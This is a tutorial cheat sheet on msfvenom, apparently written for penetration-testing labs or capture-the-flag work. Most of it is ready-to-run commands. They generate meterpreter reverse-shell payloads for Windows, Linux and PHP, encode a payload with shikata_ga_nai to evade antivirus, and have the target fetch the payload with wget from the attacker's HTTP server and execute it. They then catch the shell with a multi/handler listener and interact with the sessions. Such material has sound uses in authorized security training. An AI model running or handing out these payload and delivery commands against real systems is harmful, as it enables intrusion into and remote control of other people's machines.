msfvenom is a standalone command-line tool used to generate custom payloads. It combines the features of msfpayload and msfencode into one tool. You can use it to create shellcode or binaries to execute exploits manually or deliver via third-party methods.
Getting Help with msfvenom
Use the help flag to view available arguments and usage examples:
msfvenom -hThis shows details like:
- How to list payloads, encoders, platforms, and formats
- Syntax help for advanced options
- Usage examples
To avoid errors, always refer to this help output if you’re unsure how to structure a command.
Basic Syntax
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<port> -f <format> -o <output_file>-p— Specify the payloadLHOST— Your attacker IP (listener)LPORT— Listening port on your machine-f— Output format (exe, elf, raw, php, etc.)-o— Output file name
To view all options for a specific payload:
msfvenom -p <payload> --list-optionsCommon Output Formats
| Format | Description |
|---|---|
exe | Windows executable |
elf | Linux binary |
php | PHP webshell |
asp | ASP shell for Windows servers |
raw | Raw shellcode |
c | C-formatted shellcode |
psh | PowerShell script |
To list all available formats:
msfvenom --list formatsExample Payloads
Windows Reverse Shell (EXE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o win_shell.exeLinux Reverse Shell (ELF)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elfPHP Reverse Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f raw -o shell.phpC Shellcode Output
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f cIf unsure about a format name, check:
msfvenom --list formatsListing Available Payloads
You can explore payloads in multiple ways:
msfvenom -l payloadsOr from within msfconsole:
show payloadsTo filter by platform or type:
search type:payload platform:linux
search type:payload platform:windowsYou can also view encoders:
msfvenom -l encodersEncoder Usage (Optional)
If detection is a concern, you can encode the payload to obfuscate it:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o evaded.exe-e— Encoder name-i— Number of encoding iterations
List available encoders:
msfvenom -l encodersEncoders can slightly obfuscate your payload but are no longer very effective against modern AVs.
Payload Delivery and Listener Setup
After generating your payload (e.g., shell.elf), transfer it to the target:
python3 -m http.server 9000
wget http://<attacker_ip>:9000/shell.elf
chmod +x shell.elf
./shell.elfThen, set up a handler in msfconsole:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.8
set LPORT 4444
runUse sessions to view or interact with your meterpreter shells:
sessions # List active sessions
sessions -i 1 # Interact with session ID 1
background # Background a sessionTroubleshooting Payloads
If you get errors like:
[-] Cannot create payload. Check options.
Double-check that:
- Payload is valid (
-p windows/meterpreter/reverse_tcp, notwindow/metrprter) - Format exists (
-f elf,-f exe, etc.) - All required parameters (LHOST, LPORT) are set
- Platform and architecture match your target
Always use:
msfvenom -h
msfvenom -p <payload> --list-optionsTo confirm payload requirements before generating.